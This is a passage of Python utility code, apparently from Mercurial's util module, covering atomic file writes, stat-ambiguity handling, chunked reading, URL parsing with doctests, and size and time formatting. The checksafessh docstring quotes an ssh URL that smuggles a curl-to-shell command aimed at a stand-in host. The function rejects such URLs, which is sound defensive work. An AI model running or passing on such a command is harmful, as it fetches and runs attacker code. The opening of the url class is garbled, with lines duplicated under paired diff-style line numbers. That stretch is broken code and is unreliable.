        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        a change due to collision between such mtimes.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if the size of a file isn't changed.
        """
        try:
            return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other

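# Illustrative sketch (hypothetical _examplefilestat helper) of the
# write-side pattern filestat serves: if the rewritten file is ambiguous
# against the stat taken before the write, its mtime is advanced so that
# readers caching (size, ctime, mtime) still notice the change.
def _examplefilestat(path, data):
    oldstat = filestat.frompath(path)
    writefile(path, data)
    newstat = filestat.frompath(path)
    if newstat.isambig(oldstat):
        newstat.avoidambig(path, oldstat)
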
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        if exctype is not None:
            self.discard()
        else:
            self.close()

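# Illustrative sketch (hypothetical _exampleatomicwrite helper) of the
# context-manager protocol implemented above: on a clean exit the
# temporary copy is renamed over the target, on an exception it is
# discarded, so no partially written file ever becomes visible.
def _exampleatomicwrite(path, data):
    with atomictempfile(path, 'wb', checkambig=True) as fp:
        fp.write(data)
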
def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty"""
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    # try removing directories that might now be empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass

def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise

def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)

def readfile(path):
    with open(path, 'rb') as fp:
        return fp.read()

def writefile(path, text):
    with open(path, 'wb') as fp:
        fp.write(text)

def appendfile(path, text):
    with open(path, 'ab') as fp:
        fp.write(text)

class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)

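# Illustrative sketch (hypothetical _examplechunkbuffer helper):
# re-slicing an iterator of unevenly sized chunks into fixed-size reads.
def _examplechunkbuffer():
    buf = chunkbuffer(iter(['abc', 'defgh', 'i']))
    # -> ('abcd', 'efgh', 'i')
    return buf.read(4), buf.read(4), buf.read(4)
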
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file, size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        if limit is None:
            nbytes = size
        else:
            nbytes = min(limit, size)
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s

class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        if not self._left:
            return b''

        if n < 0:
            n = self._left

        data = self._fh.read(min(n, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        res = self.read(len(b))
        if res is None:
            return None

        b[0:len(res)] = res
        return len(res)

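# Illustrative sketch (hypothetical _examplecappedread helper): bounding
# reads of a length-prefixed payload so a consumer cannot run past the
# frame it was handed.
def _examplecappedread(fh, framelength):
    reader = cappedreader(fh, framelength)
    payload = reader.read()       # at most framelength bytes
    assert reader.read() == b''   # further reads behave like EOF
    return payload
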
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        return unittable[-1][2] % count

    return go

def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline

bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )

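# Illustrative sketch (hypothetical _examplebytecount helper) of how the
# table above picks a unit and precision from the magnitude of the count.
def _examplebytecount():
    # -> ('4.00 KB', '118 MB')
    return bytecount(4096), bytecount(123456789)
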
class transformingwriter(object):
    """Writable file wrapper to transform data by function"""

    def __init__(self, fp, encode):
        self._fp = fp
        self._encode = encode

    def close(self):
        self._fp.close()

    def flush(self):
        self._fp.flush()

    def write(self, data):
        return self._fp.write(self._encode(data))

# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    return _eolre.sub('\n', s)

def tocrlf(s):
    return _eolre.sub('\r\n', s)

def _crlfwriter(fp):
    return transformingwriter(fp, tocrlf)

if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity

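# Illustrative sketch (hypothetical _exampleeolroundtrip helper): the
# helpers above normalize text for the local platform and back.
def _exampleeolroundtrip(s):
    native = tonativeeol(s)      # '\n' -> '\r\n' on Windows, no-op elsewhere
    return fromnativeeol(native) # back to LF-only line endings
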
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp

def iterlines(iterator):
    for chunk in iterator:
        for line in chunk.splitlines():
            yield line

def expandpath(path):
    return os.path.expanduser(os.path.expandvars(path))

def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if mainfrozen():
        if getattr(sys, 'frozen', None) == 'macosx_app':
            # Env variable set by py2app
            return [encoding.environ['EXECUTABLEPATH']]
        else:
            return [pycompat.sysexecutable]
    return gethgcmd()

def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent waits on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        terminated.add(os.wait())
    prevhandler = None
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        if prevhandler is not None:
            signal.signal(signal.SIGCHLD, prevhandler)

def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows escaping the prefix by
    doubling it.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)

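# Illustrative sketch (hypothetical _exampleinterpolate helper): expanding
# '%'-style placeholders with escape_prefix, so a doubled '%%' collapses to
# a literal '%'. The '\%' prefix is pre-escaped for the regular expression,
# as the docstring above requires.
def _exampleinterpolate():
    mapping = {'user': 'joe', 'repo': 'hg'}
    # -> 'joe pushed to hg (100%)'
    return interpolate(br'\%', mapping, '%user pushed to %repo (100%%)',
                       escape_prefix=True)
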
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        pass

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise error.Abort(_("no port number associated with service '%s'")
                          % port)

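# Illustrative sketch (hypothetical _examplegetport helper): both accepted
# input forms. The 'https' lookup yields 443 on systems whose services
# database defines it.
def _examplegetport():
    return getport(8080), getport('https')  # -> (8080, 443)
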
2815 class url(object):
2813 class url(object):
2816 r"""Reliable URL parser.
2814 r"""Reliable URL parser.
2817
2815
2818 This parses URLs and provides attributes for the following
2816 This parses URLs and provides attributes for the following
2819 components:
2817 components:
2820
2818
2821 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2819 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2822
2820
2823 Missing components are set to None. The only exception is
2821 Missing components are set to None. The only exception is
2824 fragment, which is set to '' if present but empty.
2822 fragment, which is set to '' if present but empty.
2825
2823
2826 If parsefragment is False, fragment is included in query. If
2824 If parsefragment is False, fragment is included in query. If
2827 parsequery is False, query is included in path. If both are
2825 parsequery is False, query is included in path. If both are
2828 False, both fragment and query are included in path.
2826 False, both fragment and query are included in path.
2829
2827
2830 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2828 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2831
2829
    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    _safechars = "!~*'()+"
    _safepchars = "/!~*'()+:\\"
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLs
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                not (self.host.startswith('[') and self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise error.Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, v))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))
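
    # A minimal sketch of what authinfo() yields for a URL carrying
    # credentials (the host name is illustrative): the second element is
    # the tuple handed to urllib2's password manager, with the
    # credential-free URL and the bare host in the URI slot.
    #
    #   >>> url(b'http://joe:xyz@example.com/repo').authinfo()
    #   ('http://example.com/repo',
    #    (None, ('http://example.com/repo', 'example.com'), 'joe', 'xyz'))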

    def isabs(self):
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')

def hasscheme(path):
    return bool(url(path).scheme)

def hasdriveletter(path):
    return path and path[1:2] == ':' and path[0:1].isalpha()
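
# A sketch of the drive-letter test (string literals here follow this
# module's byte-string conventions; note the function returns the truthy
# expression itself, not a canonical boolean):
#
#   >>> bool(hasdriveletter(b'c:/temp'))
#   True
#   >>> bool(hasdriveletter(b'/tmp'))
#   False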

def urllocalpath(path):
    return url(path, parsequery=False, parsefragment=False).localpath()

def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploitable urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (pycompat.bytestr(path),))
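
# A sketch of the check in action (the host and option values are
# illustrative):
#
#   >>> checksafessh(b'ssh://joe@example.com/repo')   # safe; returns None
#   >>> checksafessh(b'ssh://-oProxyCommand=x')       # raises error.Abort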

def hidepassword(u):
    '''hide user credential in a url string'''
    u = url(u)
    if u.passwd:
        u.passwd = '***'
    return bytes(u)

def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    return str(u)
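
# Expected behavior, as a sketch (the host name is illustrative):
#
#   >>> hidepassword(b'http://joe:xyz@example.com/repo')
#   'http://joe:***@example.com/repo'
#   >>> removeauth(b'http://joe:xyz@example.com/repo')
#   'http://example.com/repo'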

timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )
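
# timecount() picks the coarsest entry whose threshold (multiplier *
# divisor) the value clears, assuming unitcountfn() (defined earlier in
# this module) keeps its first-match-wins semantics. A sketch:
#
#   >>> timecount(2.5)
#   '2.500 s'
#   >>> timecount(0.0123)
#   '12.30 ms'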

_timenesting = [0]

def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        start = timer()
        indent = 2
        _timenesting[0] += indent
        try:
            return func(*args, **kwargs)
        finally:
            elapsed = timer() - start
            _timenesting[0] -= indent
            stderr.write('%s%s: %s\n' %
                         (' ' * _timenesting[0], func.__name__,
                          timecount(elapsed)))
    return wrapper
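
# A sketch of the stderr output for nested @timed functions (the times are
# illustrative); each nesting level indents by two spaces and inner calls
# report first, since they finish first:
#
#     inner: 12.30 ms
#   outer: 15.60 ms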

_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    t = s.strip().lower()
    try:
        for k, u in _sizeunits:
            if t.endswith(k):
                return int(float(t[:-len(k)]) * u)
        return int(t)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)

class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda x: x[0])
        results = []
        for source, hook in self._hooks:
            results.append(hook(*args))
        return results
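
# A sketch of the ordering contract (the source names 'a-ext' and 'b-ext'
# are illustrative): the 'a-ext' hook runs first because its source name
# sorts first, and results come back in the same order.
#
#   >>> h = hooks()
#   >>> h.add('b-ext', lambda x: x + 1)
#   >>> h.add('a-ext', lambda x: x * 2)
#   >>> h(3)
#   [6, 4]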

def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not to be used in production code but very convenient while developing.
    '''
    entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
